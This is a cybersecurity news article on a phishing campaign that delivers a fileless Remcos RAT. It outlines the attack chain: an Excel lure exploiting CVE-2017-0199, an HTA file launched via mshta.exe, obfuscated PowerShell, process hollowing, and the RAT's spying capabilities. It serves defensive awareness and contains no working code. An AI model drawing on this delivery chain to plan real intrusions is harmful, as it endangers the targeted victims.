In a startling discovery, cybersecurity researchers have uncovered a new, stealthy phishing campaign distributing a fileless version of Remcos RAT, a commercially available malware offering sophisticated remote access capabilities. According to Fortinet FortiGuard Labs researcher Xiaopeng Zhang, Remcos RAT boasts "an extensive suite of features enabling purchasers to control target systems remotely." Yet, cybercriminals have co-opted this tool to covertly extract sensitive data from victims' devices and execute malicious commands remotely.
The Phishing Attack Strategy
The campaign kicks off with a phishing email masquerading as a purchase order, enticing recipients to open a seemingly innocuous Microsoft Excel attachment. Once opened, the Excel document exploits a critical remote code execution vulnerability in Office (CVE-2017-0199, CVSS score: 7.8) to download a malicious HTML Application (HTA) file. This file, "cookienetbookinetcahce.hta," is retrieved from a remote server and launched via mshta.exe, activating the malware.
Multi-Layered Obfuscation and Anti-Detection Techniques
The downloaded HTA file is meticulously layered with JavaScript, Visual Basic Script, and PowerShell code, enhancing its ability to evade detection. This file downloads an executable payload, which subsequently executes a highly obfuscated PowerShell program equipped with a myriad of anti-analysis and anti-debugging techniques. These evasive tactics further complicate detection and analysis, allowing the malware to proceed undetected.
By utilizing process hollowing, this fileless variant of Remcos RAT injects itself directly into the process memory, bypassing conventional file-based detection. Once deployed, Remcos RAT can pilfer a wide array of system information, remotely execute commands, terminate processes, edit the Windows Registry, capture audio/video from the camera and microphone, and even disable keyboard and mouse functions.
Evolving Phishing Techniques
The rise of such advanced phishing tactics highlights a disturbing trend: threat actors are continually innovating to circumvent cybersecurity defenses. Wallarm recently disclosed a similar phishing campaign leveraging DocuSign APIs to distribute fake invoices, adding legitimacy and bypassing conventional security measures. Additionally, unconventional techniques like ZIP file concatenation have been used to distribute remote access trojans while evading detection.
Takeaway: Reinforced Vigilance and Enhanced Security
These findings serve as a stark reminder for organizations and individuals alike to adopt robust cybersecurity practices. By exploiting familiar tools and sophisticated delivery methods, cybercriminals are reaching new heights in bypassing detection—underlining the need for constant vigilance and enhanced security measures to protect against these insidious threats.